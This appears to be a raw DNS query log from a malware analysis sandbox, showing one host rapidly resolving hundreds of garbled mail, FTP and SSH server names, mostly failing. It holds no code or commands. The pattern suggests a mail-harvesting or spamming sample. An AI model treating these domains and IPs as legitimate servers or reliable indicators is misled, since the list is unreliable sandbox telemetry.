Nov 30, 2023 11:22:37.070002079 CET	1.1.1.1	192.168.2.4	0xb561	Name error (3)	fldie12.jdgwcollfaaba.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.103837967 CET	1.1.1.1	192.168.2.4	0xd028	No error (0)	mail.mailerhost.net		5.161.133.13	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.103837967 CET	1.1.1.1	192.168.2.4	0xd028	No error (0)	mail.mailerhost.net		161.35.84.83	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.311058044 CET	1.1.1.1	192.168.2.4	0xf20e	No error (0)	aspmx.l.google.com		142.251.179.26	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:37.458220959 CET	1.1.1.1	192.168.2.4	0x5ebb	No error (0)	mail.nrnet.com		45.32.206.101	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.377321959 CET	1.1.1.1	192.168.2.4	0x37af	No error (0)	gmr-smtp-in.l.google.com		172.253.122.14	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.398600101 CET	1.1.1.1	192.168.2.4	0xad35	Name error (3)	ftp.daytonpubhocso.cog	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.404536963 CET	1.1.1.1	192.168.2.4	0xf31f	No error (0)	mail.1.tv		15.197.172.60	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.491727114 CET	1.1.1.1	192.168.2.4	0xfbf9	Name error (3)	imap.ochcar.cin4g9tdamn.bagcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.492995977 CET	1.1.1.1	192.168.2.4	0x16be	Name error (3)	mailgate.t.ahlfth	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.493828058 CET	1.1.1.1	192.168.2.4	0xb28c	No error (0)	mail.h-email.net		91.107.214.206	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.493828058 CET	1.1.1.1	192.168.2.4	0xb28c	No error (0)	mail.h-email.net		5.75.171.74	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.493828058 CET	1.1.1.1	192.168.2.4	0xb28c	No error (0)	mail.h-email.net		178.62.199.248	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.493828058 CET	1.1.1.1	192.168.2.4	0xb28c	No error (0)	mail.h-email.net		165.227.159.144	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.493828058 CET	1.1.1.1	192.168.2.4	0xb28c	No error (0)	mail.h-email.net		165.227.156.49	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.493828058 CET	1.1.1.1	192.168.2.4	0xb28c	No error (0)	mail.h-email.net		49.13.4.90	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.493828058 CET	1.1.1.1	192.168.2.4	0xb28c	No error (0)	mail.h-email.net		5.161.194.135	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.493828058 CET	1.1.1.1	192.168.2.4	0xb28c	No error (0)	mail.h-email.net		167.235.143.33	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.493828058 CET	1.1.1.1	192.168.2.4	0xb28c	No error (0)	mail.h-email.net		5.161.98.212	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.493828058 CET	1.1.1.1	192.168.2.4	0xb28c	No error (0)	mail.h-email.net		162.55.164.116	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.495287895 CET	1.1.1.1	192.168.2.4	0xb59f	Name error (3)	mail.hot13l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.527726889 CET	1.1.1.1	192.168.2.4	0x4f59	Name error (3)	ftp.wr.omt222lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.559825897 CET	1.1.1.1	192.168.2.4	0x2a23	Name error (3)	ftp.tload.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.608906984 CET	1.1.1.1	192.168.2.4	0x6707	Name error (3)	mail.tbsayail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.703830957 CET	1.1.1.1	192.168.2.4	0xada1	Name error (3)	mail.he0114zusmg454lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.723151922 CET	1.1.1.1	192.168.2.4	0xffaf	Name error (3)	imap.wr.omt222lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.725181103 CET	1.1.1.1	192.168.2.4	0xe888	Name error (3)	ftp.domo5ho.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.728713989 CET	1.1.1.1	192.168.2.4	0xee9b	Name error (3)	mail.loaquorezcil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.747122049 CET	1.1.1.1	192.168.2.4	0x6c22	Name error (3)	ssh.n.n.amdiu	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.747767925 CET	1.1.1.1	192.168.2.4	0x811a	Name error (3)	mail.yahjl.cxs	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.749211073 CET	1.1.1.1	192.168.2.4	0x8bb8	Name error (3)	ftp.ayls.xcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.751929045 CET	1.1.1.1	192.168.2.4	0x6f04	Name error (3)	ssh.ayls.xcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.754497051 CET	1.1.1.1	192.168.2.4	0xef63	Name error (3)	ftp.acooil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.754530907 CET	1.1.1.1	192.168.2.4	0xc5e5	Name error (3)	ftp.yahio.comcm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.754678965 CET	1.1.1.1	192.168.2.4	0x46c2	Name error (3)	ssh.acooil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.756242037 CET	1.1.1.1	192.168.2.4	0x234c	Name error (3)	ssh.hotmea1aia.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.756278038 CET	1.1.1.1	192.168.2.4	0x4a8d	Name error (3)	pop.ee.idbo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.757360935 CET	1.1.1.1	192.168.2.4	0x2c77	Name error (3)	mail.ee.idbo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.757443905 CET	1.1.1.1	192.168.2.4	0xc9e4	Name error (3)	pop3.yahnt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.757477045 CET	1.1.1.1	192.168.2.4	0x9339	Name error (3)	pop.hotmea1aia.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.758342028 CET	1.1.1.1	192.168.2.4	0xc490	Name error (3)	ftp.gmai76afmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.758651972 CET	1.1.1.1	192.168.2.4	0xe58b	Name error (3)	ftp.gmaigcmar19l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.759908915 CET	1.1.1.1	192.168.2.4	0x567a	Name error (3)	ftp.comcamm.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.764602900 CET	1.1.1.1	192.168.2.4	0x4e60	Name error (3)	pop.gtblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.766542912 CET	1.1.1.1	192.168.2.4	0x97eb	Name error (3)	ftp.pyctl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.775568962 CET	1.1.1.1	192.168.2.4	0xf10b	Name error (3)	ssh.23xd5a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.776515961 CET	1.1.1.1	192.168.2.4	0xf2a7	No error (0)	mx.hetemail.jp		157.7.44.163	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.776576042 CET	1.1.1.1	192.168.2.4	0xf2a7	No error (0)	mx.hetemail.jp		157.7.44.163	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.777800083 CET	1.1.1.1	192.168.2.4	0x6535	Name error (3)	mail.s.ddo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.784225941 CET	1.1.1.1	192.168.2.4	0x2a94	Name error (3)	ftp.as.hauet	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.786575079 CET	1.1.1.1	192.168.2.4	0x2161	Name error (3)	ftp.t.ahlfth	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.790184975 CET	1.1.1.1	192.168.2.4	0xba9d	Name error (3)	ftp.ez786-lcolwicn.coofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.790705919 CET	1.1.1.1	192.168.2.4	0x1f09	Name error (3)	mail.ytcjmiil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.793128014 CET	1.1.1.1	192.168.2.4	0xc61	Name error (3)	mailgate.ayls.xcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.793154955 CET	1.1.1.1	192.168.2.4	0x1745	Name error (3)	ftp.yahnt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.793840885 CET	1.1.1.1	192.168.2.4	0x3520	Name error (3)	ftp.buromaril.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.794758081 CET	1.1.1.1	192.168.2.4	0x6148	Name error (3)	ssh.yahnt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.795542002 CET	1.1.1.1	192.168.2.4	0xf311	Name error (3)	pop3.yahgt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.796581984 CET	1.1.1.1	192.168.2.4	0x8eb7	Name error (3)	mail.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.797827959 CET	1.1.1.1	192.168.2.4	0xfb4f	Name error (3)	mail.as.r.upze	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.798211098 CET	1.1.1.1	192.168.2.4	0x23b9	No error (0)	mail.bjail.com	traff-4.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:22:38.798211098 CET	1.1.1.1	192.168.2.4	0x23b9	No error (0)	traff-4.hugedomains.com	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:22:38.798211098 CET	1.1.1.1	192.168.2.4	0x23b9	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		3.94.41.167	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.798211098 CET	1.1.1.1	192.168.2.4	0x23b9	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		52.86.6.113	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.804583073 CET	1.1.1.1	192.168.2.4	0x7a09	Name error (3)	mail.yahgr.neaco	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.810350895 CET	1.1.1.1	192.168.2.4	0x2f4a	Name error (3)	mail.caatholiomissa.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.811919928 CET	1.1.1.1	192.168.2.4	0x57d4	Name error (3)	ftp.hotmea1aia.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.815181971 CET	1.1.1.1	192.168.2.4	0x9631	Name error (3)	mail.yah23051987hont.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.821052074 CET	1.1.1.1	192.168.2.4	0xbeeb	Name error (3)	ssh.yah23051987hont.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.824042082 CET	1.1.1.1	192.168.2.4	0x676e	Name error (3)	ssh.zma51baya.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.824270010 CET	1.1.1.1	192.168.2.4	0xacba	Name error (3)	mail.yahgt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.837043047 CET	1.1.1.1	192.168.2.4	0xb2ae	Name error (3)	mail.z-a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.840081930 CET	1.1.1.1	192.168.2.4	0x618e	Name error (3)	ssh.tbsayail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.850476027 CET	1.1.1.1	192.168.2.4	0xa228	Name error (3)	mail.zma51baya.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.850727081 CET	1.1.1.1	192.168.2.4	0xbdec	Name error (3)	ftp.gbivlporollm.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.855135918 CET	1.1.1.1	192.168.2.4	0xfd1f	Name error (3)	ftp.rhacmtu.au	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.873759985 CET	1.1.1.1	192.168.2.4	0x9bcf	Name error (3)	ftp.phcg87k6barre352odseba.dcivenail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.877993107 CET	1.1.1.1	192.168.2.4	0x4e3f	Name error (3)	ftp.osrniamadvea.lrhzda.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.890216112 CET	1.1.1.1	192.168.2.4	0xeb1a	Server failure (2)	mailgate.h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.891735077 CET	1.1.1.1	192.168.2.4	0x5e81	Name error (3)	imap.gbivlporollm.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.911767006 CET	1.1.1.1	192.168.2.4	0xf946	Name error (3)	ftp.ser711a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.917498112 CET	1.1.1.1	192.168.2.4	0xa46e	Name error (3)	ftp.asail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.928582907 CET	1.1.1.1	192.168.2.4	0xd1d5	Name error (3)	mail.gbivlporollm.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.953099966 CET	1.1.1.1	192.168.2.4	0xcc3d	Name error (3)	mail.horadguc1995l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.959580898 CET	1.1.1.1	192.168.2.4	0x6508	Server failure (2)	ftp.rknsieiwn.ail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.964150906 CET	1.1.1.1	192.168.2.4	0xdbe8	No error (0)	mail.hul.co.uk		68.183.34.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.964204073 CET	1.1.1.1	192.168.2.4	0xdbe8	No error (0)	mail.hul.co.uk		68.183.34.12	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.964574099 CET	1.1.1.1	192.168.2.4	0x2cfa	Name error (3)	mail.comcaio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.971715927 CET	1.1.1.1	192.168.2.4	0xeb1a	Server failure (2)	mailgate.h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.976933956 CET	1.1.1.1	192.168.2.4	0x57d9	Name error (3)	mail.yahpn.yb	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.978243113 CET	1.1.1.1	192.168.2.4	0x2b28	Name error (3)	ssh.yahfll.ianus	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.987584114 CET	1.1.1.1	192.168.2.4	0x6508	Server failure (2)	ftp.rknsieiwn.ail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:38.999449015 CET	1.1.1.1	192.168.2.4	0x88e0	Name error (3)	mail.phcg87k6barre352odseba.dcivenail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.001696110 CET	1.1.1.1	192.168.2.4	0xd65f	Name error (3)	ssh.caatholiomissa.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.003537893 CET	1.1.1.1	192.168.2.4	0xe4cc	Name error (3)	ftp.gmdcblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.012397051 CET	1.1.1.1	192.168.2.4	0x2cfa	Name error (3)	mail.comcaio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.023435116 CET	1.1.1.1	192.168.2.4	0x3edb	Name error (3)	pop.getococuail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.025212049 CET	1.1.1.1	192.168.2.4	0x43ef	Name error (3)	mailgate.mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.033849001 CET	1.1.1.1	192.168.2.4	0xc369	Name error (3)	imap.a.o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.033910990 CET	1.1.1.1	192.168.2.4	0xd1d5	Name error (3)	mail.gbivlporollm.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.035269976 CET	1.1.1.1	192.168.2.4	0xf946	Name error (3)	ftp.ser711a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.039442062 CET	1.1.1.1	192.168.2.4	0x7adf	Name error (3)	mail.fldie12.jdgwcollfaaba.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.041347980 CET	1.1.1.1	192.168.2.4	0xc77c	Name error (3)	ftp.hl.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.044919968 CET	1.1.1.1	192.168.2.4	0x671c	Name error (3)	ftp.23xd5a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.045037985 CET	1.1.1.1	192.168.2.4	0xa31e	Name error (3)	mail.comcaci.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.046921015 CET	1.1.1.1	192.168.2.4	0x6766	Name error (3)	ssh.hot13l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.050163031 CET	1.1.1.1	192.168.2.4	0x435f	Name error (3)	ssh.t-yil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.051656008 CET	1.1.1.1	192.168.2.4	0x43ef	Name error (3)	mailgate.mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.058509111 CET	1.1.1.1	192.168.2.4	0xab80	Name error (3)	ftp.e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.058568954 CET	1.1.1.1	192.168.2.4	0xab80	Name error (3)	ftp.e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.127657890 CET	1.1.1.1	192.168.2.4	0xce9e	Name error (3)	ftp.h333ol03t8rwslive21lok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.205223083 CET	1.1.1.1	192.168.2.4	0x921e	Name error (3)	wr.omt222lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.228327990 CET	1.1.1.1	192.168.2.4	0x9383	Name error (3)	tload.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.230652094 CET	1.1.1.1	192.168.2.4	0xd947	Name error (3)	domo5ho.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.299773932 CET	1.1.1.1	192.168.2.4	0xcde4	Name error (3)	qhlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.335573912 CET	1.1.1.1	192.168.2.4	0x358d	Name error (3)	ssh.daytonpubhocso.cog	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.336905956 CET	1.1.1.1	192.168.2.4	0xb56b	Name error (3)	ssh.comcaci.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.337974072 CET	1.1.1.1	192.168.2.4	0xf1e5	Name error (3)	23xd5a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.338570118 CET	1.1.1.1	192.168.2.4	0x8779	Name error (3)	relay.t.ahlfth	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.339168072 CET	1.1.1.1	192.168.2.4	0x50d5	Name error (3)	osrniamadvea.lrhzda.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.340570927 CET	1.1.1.1	192.168.2.4	0xa9cd	Name error (3)	asgmaanxgdil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.341567993 CET	1.1.1.1	192.168.2.4	0xb088	Name error (3)	gmaigcmar19l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.348692894 CET	1.1.1.1	192.168.2.4	0x3ed8	Name error (3)	ftp.sbcglob4m.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.352660894 CET	1.1.1.1	192.168.2.4	0xe8d5	Name error (3)	ftp.gmaiuilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.372826099 CET	1.1.1.1	192.168.2.4	0x57fa	Name error (3)	mail.yahpl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.375250101 CET	1.1.1.1	192.168.2.4	0x2217	Name error (3)	ftp.acesineuiw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.383203983 CET	1.1.1.1	192.168.2.4	0xab92	Name error (3)	mail.as.hauet	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.386836052 CET	1.1.1.1	192.168.2.4	0x8a6d	Name error (3)	yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.387973070 CET	1.1.1.1	192.168.2.4	0xec9a	Name error (3)	ssh.getococuail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.397537947 CET	1.1.1.1	192.168.2.4	0x5bf9	Name error (3)	mail.t-yil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.401098013 CET	1.1.1.1	192.168.2.4	0xff1c	Name error (3)	mail.gmaigcmar19l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.456212044 CET	1.1.1.1	192.168.2.4	0xd989	Name error (3)	zma51baya.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.538146973 CET	1.1.1.1	192.168.2.4	0x2edb	Name error (3)	ftp.gez542l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.660226107 CET	1.1.1.1	192.168.2.4	0x57fa	Name error (3)	mail.yahpl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.660517931 CET	1.1.1.1	192.168.2.4	0x2217	Name error (3)	ftp.acesineuiw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.660727024 CET	1.1.1.1	192.168.2.4	0xec9a	Name error (3)	ssh.getococuail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.660801888 CET	1.1.1.1	192.168.2.4	0xab92	Name error (3)	mail.as.hauet	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.660955906 CET	1.1.1.1	192.168.2.4	0xd989	Name error (3)	zma51baya.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.661191940 CET	1.1.1.1	192.168.2.4	0x5bf9	Name error (3)	mail.t-yil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.661370039 CET	1.1.1.1	192.168.2.4	0x2edb	Name error (3)	ftp.gez542l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.661731005 CET	1.1.1.1	192.168.2.4	0x8a6d	Name error (3)	yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.663875103 CET	1.1.1.1	192.168.2.4	0xff1c	Name error (3)	mail.gmaigcmar19l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.668390989 CET	1.1.1.1	192.168.2.4	0xe394	Name error (3)	comcaci.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.674779892 CET	1.1.1.1	192.168.2.4	0xc72	Name error (3)	mail.gmdcblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.675266027 CET	1.1.1.1	192.168.2.4	0x359f	Name error (3)	mail.sbcglob4m.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.676855087 CET	1.1.1.1	192.168.2.4	0xc619	Name error (3)	mail.sbcgloboo.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.678627014 CET	1.1.1.1	192.168.2.4	0x1d33	Name error (3)	ftp.comcaci.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.679414988 CET	1.1.1.1	192.168.2.4	0xfefe	Name error (3)	mail.h333ol03t8rwslive21lok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.680838108 CET	1.1.1.1	192.168.2.4	0xb6fe	Name error (3)	mail.rhacmtu.au	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.682095051 CET	1.1.1.1	192.168.2.4	0xce9e	Name error (3)	ftp.yahcl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.687076092 CET	1.1.1.1	192.168.2.4	0x4a76	Name error (3)	imap.he0114zusmg454lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.690293074 CET	1.1.1.1	192.168.2.4	0x843d	Name error (3)	pop.yahjl.cxs	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.708638906 CET	1.1.1.1	192.168.2.4	0xbc68	Name error (3)	mail.osrniamadvea.lrhzda.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.716463089 CET	1.1.1.1	192.168.2.4	0x3545	Name error (3)	mail.comcamm.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.727792978 CET	1.1.1.1	192.168.2.4	0xe2f1	Name error (3)	ftp.a.o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.746254921 CET	1.1.1.1	192.168.2.4	0xf113	Name error (3)	ftp.asgmaanxgdil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.793900013 CET	1.1.1.1	192.168.2.4	0x4605	Name error (3)	relay.ayls.xcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.828838110 CET	1.1.1.1	192.168.2.4	0xf6f3	Name error (3)	ftp.yahwoooie2ampu.comsh	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.828903913 CET	1.1.1.1	192.168.2.4	0x32e0	Name error (3)	ssh.comcamm.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.832386017 CET	1.1.1.1	192.168.2.4	0x55a8	Name error (3)	mail.23xd5a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.835421085 CET	1.1.1.1	192.168.2.4	0xda99	Name error (3)	ftp.tbsayail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.836755991 CET	1.1.1.1	192.168.2.4	0x11f4	Name error (3)	ssh.domo5ho.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.859193087 CET	1.1.1.1	192.168.2.4	0x5d0e	Name error (3)	pop3.gtblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.899597883 CET	1.1.1.1	192.168.2.4	0x2af6	Name error (3)	getococuail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.899609089 CET	1.1.1.1	192.168.2.4	0xb40a	Name error (3)	mail.f.nyhm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.900098085 CET	1.1.1.1	192.168.2.4	0x9086	Name error (3)	ssh.tload.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.915235043 CET	1.1.1.1	192.168.2.4	0xfff1	Name error (3)	pop.gbivlporollm.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:39.946342945 CET	1.1.1.1	192.168.2.4	0x1e6d	Name error (3)	mail.syn.lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.006073952 CET	1.1.1.1	192.168.2.4	0x9ae	Name error (3)	ftp.zma51baya.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.009218931 CET	1.1.1.1	192.168.2.4	0xde36	Name error (3)	pop.yahpn.yb	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.009938002 CET	1.1.1.1	192.168.2.4	0x7990	Name error (3)	ftp.getococuail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:40.014493942 CET	1.1.1.1	192.168.2.4	0xf282	Name error (3)	ftp.t-yil.com	none	none	A (IP address)	IN (0x0001)	false
